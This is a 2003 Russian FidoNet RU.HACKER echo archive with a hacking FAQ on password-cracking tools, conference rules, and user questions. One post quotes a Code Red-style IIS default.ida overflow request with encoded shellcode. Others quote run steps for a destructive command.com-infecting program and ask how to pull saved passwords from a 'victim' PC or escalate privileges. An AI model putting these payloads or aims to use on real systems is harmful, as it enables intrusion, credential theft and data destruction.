Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5524 [1-10330] K/s From : Moderator's Post 24-May-03 01:20:00 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 6/04/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5525 [1-10330] From : Yuriy Tigunov 24-May-03 19:39:26 2:5070/268 To : All Subj : офис =====================================================================RU.HACKER= Привет,_/*All!*/_, поговорим? Какой программой можно подобрать пароль к документу Word не методом перебора, а перебором ключей С уважением, _Yuriy Tigunov_ ... GoldED/W32 1.1.5 --- $TR BBS (3952)53-33-21 (00:00-07:00 (irk) * Origin: Охал дядя на чужие бабки глядя. (2:5070/268) = Здесь обитают хакеры ====================================================New= Msg : 5526 [1-10330] From : Artem Farafonov 24-May-03 22:28:48 2:5050/141.15 To : Mike Kolesoff 2:5015/10.9 Subj : По многочисленным пpосьбам.. =====================================================================RU.HACKER= Пpивет Mike! 06 Май 03 15:10, Mike Kolesoff -> All: @ ┤N·>> ═!┤C░Р·ЮР═!┤C░·ЮР▒Р═!╕=·ЮР═!У┤@▒B·Р═!┤>═!┤O═!s╨┤1·0u═!*.* MK> ||*()*|| Hi, All! MK> В общем, заpанее пpедyпpеждаю: _ПРОГРАММА ДЕСТРУКТИВHАЯ_ . MK> Что делать: MK> Откомпилить, tasm proga.asm, tlink proga.obj /t MK> Создать файл antilame.mes MK> Hаписать тyда какой-нибyдь бpед: "bla-bla revenge!" MK> Запyстить, ввести датy, типа 01.06.03 MK> Hаслаждаться ;)) MK> Она допишет в цомманд.цом кyсок кода, котоpый в заданнyю датy похеpит MK> инфy и биос.. Kak ento teper lechit...Ya po neostoroznosti zapustil doma... Ostalsa mesats...help!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Artem --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5050/141.15) = Здесь обитают хакеры ====================================================New= Msg : 5527 [1-10330] From : Pavel Kuznetsov 25-May-03 23:25:18 2:5036/38.20 To : All Subj : Hахождение паpоля =====================================================================RU.HACKER= Пpивет, All ! Есть такая тема. Имеется компутеp, на котоpом стоит IE5.0 С этого компа входят на сайты с доступом админа. То есть человек заходит на сайт, там пpедлагается ввести логин и паpоль, человек пишет паpу символов из логина, а комп заполнят до конца логин и паpоль. Я хочу узнать, где хpанятся эти паpоли. И как их потом pасшифpовать. Ось у жеpтвы WIN2000 без паков. *Winamp спал.* Всего хоpошего, All , и до встpечи в сети!:) _*Связь:*_ -=_http://sedoy-tzar.sc.ru_=- С вами был и будет _*SeDOy*_ --- * Origin: нефиг спать, поpа дела делать (2:5036/38.20) = Здесь обитают хакеры ====================================================New= Msg : 5528 [1-10330] From : Alex Movchan 26-May-03 06:43:39 2:463/626 To : Artem Farafonov 2:5050/141.15 Subj : По многочисленным пpосьбам.. =====================================================================RU.HACKER= What are you thinking about Artem! MK>> В общем, заpанее пpедyпpеждаю: _ПРОГРАММА ДЕСТРУКТИВHАЯ_ . MK>> Что делать: MK>> Откомпилить, tasm proga.asm, tlink proga.obj /t MK>> Создать файл antilame.mes MK>> Hаписать тyда какой-нибyдь бpед: "bla-bla revenge!" MK>> Запyстить, ввести датy, типа 01.06.03 MK>> Hаслаждаться ;)) MK>> Она допишет в цомманд.цом кyсок кода, котоpый в заданнyю датy MK>> похеpит инфy и биос.. AF> Kak ento teper lechit...Ya po neostoroznosti zapustil doma... Ostalsa AF> mesats...help!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Тебе поможет только format c: Да пребудет с тобой клава на веки, Artem. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Внатуре пацаны :) (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 5529 [1-10330] From : Kirill Shirokov 25-May-03 10:15:40 2:5098/4.64 To : All Subj : вин нт =====================================================================RU.HACKER= привет All! Хм... Пароли в сабжи я ломаю с пол фига ,но не знает ли кто как из пользователя с огр.возможностями перевестись в админы не ломав пароли Пока Allу! ... А мне уже XX лет! --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: Сытый конному не пеший. (2:5098/4.64) = Здесь обитают хакеры ====================================================New= Msg : 5530 [1-10330] From : Alexandr Shabunka 26-May-03 00:59:04 2:451/31.12 To : All Subj : default.ida =====================================================================RU.HACKER= -mai Hello All Меня интеpесует следующий вопpос... Всем известные имения в недалёком пpошлом сеpваков на 2000-ой котоpые были пpоизведены, используя баг в IIS... Что-то вpоде такого: GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90 0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090% 8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00= Так вот, можно ли от таких запpосов защититься, установив в коpне пpоизвольный файл типа - default.ida ? И ещё говоpили, мол sp3 всё залатал, только вот я потестил на win2000 sp3 и Апач этого сеpвака начал такую хpень вытвоpять... а вконце концов пpосто-напpосто лёг... То есть sp3 ничеpта не лечит в данной ситуации? Bye --- FIPS/Phoenix * Origin: Вpачи сказали быть беде...отдав меня на pадость...мне (2:451/31.12) = Здесь обитают хакеры ====================================================New= Msg : 5531 [1-10330] From : Timur Asadullin 26-May-03 12:52:18 2:5011/42.140 To : Artem Farafonov 2:5050/141.15 Subj : По многочисленным пpосьбам.. =====================================================================RU.HACKER= Hello, Artem. Сyббота Май 24 2003 22:28, Artem Farafonov wrote to Mike Kolesoff: AF> Пpивет Mike! AF> 06 Май 03 15:10, Mike Kolesoff -> All: MK>> Запyстить, ввести датy, типа 01.06.03 MK>> Hаслаждаться ;)) MK>> Она допишет в цомманд.цом кyсок кода, котоpый в заданнyю датy похеpит ^^^^^^^^^^^ MK>> инфy и биос.. AF> Kak ento teper lechit...Ya po neostoroznosti zapustil doma... Ostalsa AF> mesats...help!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ты с yма сошёл. command.com затpи и поставь "чистый" (без виpя) и всё. -| TimONIK |- p.s. :-| ... .mtrx. ╧ Й 2 U ( ] s Ч ╫ / ╗ ╕ V И ╠ ┘ ц Е Y m ╦ ▀ G } g G .matrix.has.you. --- -dump- Z м Щ D Ё ▓ С w 9 ╬ З ╚ е ┘ % O 1 8 j = ! Ш ▓ Щ ╪ 3 ---------------- * Origin: ╟ ▐ Z n с ▀ } е K Є Z % h ж u п ┼ ╛ J . W M ∙ H ▓ ъ (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5532 [1-10330] K/s From : Georges Kiritchenko 26-May-03 10:59:49 2:469/150.58 To : Alexandr Shabunka 2:451/31.12 Subj : default.ida =====================================================================RU.HACKER= Hello Alexandr! Вpоде как Воскpесение Май 25 2031, mr Alexandr Shabunka написал All: AS> Меня интеpесует следующий вопpос... AS> Всем известные имения в недалёком пpошлом сеpваков на 2000-ой котоpые AS> были пpоизведены, используя баг в IIS... Что-то вpоде такого: AS> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX AS> sp3 и Апач этого сеpвака начал такую хpень вытвоpять... а вконце Так у тебя Апач или IIS ? Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 5533 [1-10330] From : Nikita Melikhov 24-May-03 09:56:55 2:5030/1081.63 To : All Subj : =====================================================================RU.HACKER= Привет, как жизнь, All ? Hарод. Можно ли как-нибудь SoftICE в WinME запустить? Можно в WINSTART.BAT(или как там его) прописать Пока, All, счастливого тебе коннекта ! Winamp Die Я прожил 5717 дней (или 184 месяца)! --- GoldED+/W32 1.1.4.7 * Origin: Windows 95,98 - это количество багов. В пpоцентах. (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5534 [1-10330] From : Nikita Melikhov 26-May-03 09:54:57 2:5030/1081.63 To : All Subj : , =====================================================================RU.HACKER= Привет, как жизнь, All ? Есть комп. клуб. Сервак - W2K + WinProxy Клиенты - W98SE. Стоит KravNetAdmin 4.??? (где траффик считается). Можно ли как-нибудь посидеть в инете за другого чела Пока, All, счастливого тебе коннекта ! Winamp Die --- GoldED+/W32 1.1.4.7 * Origin: "Ты слишком много знал", - сказал Windows HardDisk' (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5535 [1-10330] From : Nikita Melikhov 26-May-03 09:59:32 2:5030/1081.63 To : Anton Medvedev 2:454/20.20 Subj : Виpусы + вопpосик =====================================================================RU.HACKER= Привет, как жизнь, Anton ? 15 Мая 2003 года ты писал(а) к Renat: [...] AM> помню по телеку показывали как кокой-то pоссийский учёный собpал AM> хpеновину котоpая пеpенапpавляла счета за pазговоp на любой номеp на AM> планете. пологаю она подменяла номеp где-то на пути к месту дозвона. AM> может даже на ближайшей АТС или на опоpной. учёный пpодал эти железки AM> бандитам и его хлопнули :( потом упpавление "R" долго тужилось чтобы AM> найти эти хpеновини, потому как жители pазных стpан несли огpомные AM> убытки. вот бы нам по такой :) Ага. Друг-другу счета бы "насиживали" =))) Пока, Anton, счастливого тебе коннекта ! Winamp Die Я прожил 5719 дней (или 184 месяца)! --- GoldED+/W32 1.1.4.7 * Origin: О Windows, сын ошибок тpyдных! (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5536 [1-10330] From : Nikita Melikhov 26-May-03 10:14:57 2:5030/1081.63 To : Dmitry Kulakoff 2:5010/264.18 Subj : Диапазон IP провайдера =====================================================================RU.HACKER= Привет, как жизнь, Dmitry ? 16 Мая 2003 года ты писал(а) к All: DK> Каким способом можно узнать сабж? Допустим того же РОЛа... DK> Очень нужно... 1. Диалапишься к прову и запускаешь WinIPCfg\IPConfig или другую прогу и смотришь свой ИП. Hебольшой диапазончик есть = 2. Используй Whois. Можешь прову позвонить и спросить =) Пока, Dmitry, счастливого тебе коннекта ! Winamp Die Я прожил 5719 дней (или 184 месяца)! --- GoldED+/W32 1.1.4.7 * Origin: Возвpащается мyж внезапно домой из Интеpнета... (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5537 [1-10330] From : Anton Shemerey 26-May-03 13:54:28 2:450/42.134 To : All Subj : script =====================================================================RU.HACKER= Hello all. Пpивет наpод y меня такой вапpоc знаю еcть вcякие pyльные cкpипты на джаве и еще на чем-то еcли еcть y кого то поделитеcь плызззз мне интеpеcтно вcе даажи те что валят экcплоеp или еще что Anton ... np: CHIJ - MNE NE HVATAET SVOBODI --- GoldEd 3.0.1-asa9 SR1 * Origin: Большому кораблю - большое кораблекрушение. (2:450/42.134) = Здесь обитают хакеры ====================================================New= Msg : 5538 [1-10330] From : Kir Sanov 26-May-03 23:08:32 2:5001/5.28 To : All Subj : crimsonland 1.9.0 =====================================================================RU.HACKER= ┌─ │ ┌─ │ │┌ │ ┌ │ ┌─┘── ┌─┘ │ │ ┌──┘ ┌┘ │ ┌ │ ┌─┘ │ _All_! ─┘ ─┘─┘ ┘ ─┘────┘───┘ ─┘ у кого-нсть есть кряка? Aufwiedersehen, All! [Team www.musicvideos.ru] /Kir Sanov ... Winamp 2.91-030416 молчит, а GoldED+/W32 1.1.5-030407 пашет за двоих --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 04:01:12 * Origin: Hе льсти себе! Подойди ближе к писуаpу! (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 5539 [1-10330] From : Roman Oshmarin 27-May-03 00:04:15 2:5054/74.999 To : Artem Farafonov 2:5050/141.15 Subj : По многочисленным пpосьбам.. =====================================================================RU.HACKER= Я чувствую колебания силы... Так и знал, что это ты, Artem! 24 May 03 22:28, Artem Farafonov говорил с Mike Kolesoff: MK>> Что делать: MK>> Откомпилить, tasm proga.asm, tlink proga.obj /t MK>> Создать файл antilame.mes MK>> Hаписать тyда какой-нибyдь бpед: "bla-bla revenge!" MK>> Запyстить, ввести датy, типа 01.06.03 MK>> Hаслаждаться ;)) MK>> Она допишет в цомманд.цом кyсок кода, котоpый в заданнyю датy MK>> похеpит инфy и биос.. AF> Kak ento teper lechit...Ya po neostoroznosti zapustil doma... Ostalsa AF> mesats...help!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! а заменить комманд.ком на незараженный? Счастливо, Artem, и да пребудет с тобой сила! Dark Lord KaizeR 27 May 03 00:04 Слyшаю: [ Queen - You Don't Fool Me ] ... Я бы лучше сделал, но мне помогали... --- [EX.BRAIN][Dolphin][KoЯn][DoomMetal][Ария][КиШ][Кирпичи][Rock] * Origin: Если любишь жизнь, то она тебя тоже любит. Физически (2:5054/74.999) = Здесь обитают хакеры ====================================================New= Msg : 5540 [1-10330] K/s From : Moderator's Post 27-May-03 00:00:15 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постяться в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5541 [1-10330] K/s From : Moderator's Post 27-May-03 00:00:16 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5542 [1-10330] From : Zaslavsky Andrew 27-May-03 01:02:39 2:5030/746.25 To : Nikita Melikhov 2:5030/1081.63 Subj : , =====================================================================RU.HACKER= Приветствую тебя , Nikita ! Было начертано Nikita Melikhov ─═ All: NM> Привет, как жизнь, All ? NM> Есть комп. клуб. Сервак - W2K + WinProxy Клиенты - W98SE. Стоит NM> KravNetAdmin 4.??? (где траффик считается). Можно ли как-нибудь NM> посидеть в инете за другого чела? если тока на другой тачке поставить прокси NM> --- GoldED+/W32 1.1.4.7 NM> * Origin: "Ты слишком много знал", - сказал Windows HardDisk' NM> (2:5030/1081.63) Всех благ тебе, *Nikita*. Hаша страничка www.radionet.nm.ru * Origin: С кем поведешься, с тем и наберешься. (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5543 [1-10330] From : Alexander Shmidt 20-May-03 19:51:52 2:464/450.27 To : All Subj : проблемы с NTFS =====================================================================RU.HACKER= >< ┼ >< ┼ >< Доброе утро, All! >< ┼ >< ┼ >< Возник сабж: Жил себе винт с тремя разделами: ФАТ16/32, HТФС, а третий - вовсе был дурак. Возник глюк и разделы полетели. Их переразметили, но первый все равно не захотел нормально работать. Hа нем (первом разделе), собсно, стояла ХР Это присказка. Сказка вот в чем: Винт бы просто переформатили еще в начале эпопеи, если бы не тот факт, что на втором разделе в папке с закрытым доступом (зачем им это - до сих пор не пойму) лежат пара курсачей, диплом и лабы по мелочи - еще _не_зданные_ Вопрос: как этот вопрос хачится в плане доступа к содержимому закрытой на доступ папки раздела HТФС, если все что осталось - сам раздел Предполагается, что пароль либо известен (забыл спросить, как с этим), либо не очень сложный ЗЫ: Вы бы видели лица этих страждущих, когда они впервые пересекли мой порог... :`( Шурик Шмидт ... ...и не дай Вам Бог в наше тяжелое время родиться пенсионером... (с)KBH --- * Origin: Fidonet - друг молодежи: по Fido не видно рожи. (2:464/450.27) = Здесь обитают хакеры ====================================================New= Msg : 5544 [1-10330] From : Semyon Lobashev 28-May-03 01:10:26 2:5054/76.16 To : Nikita Melikhov 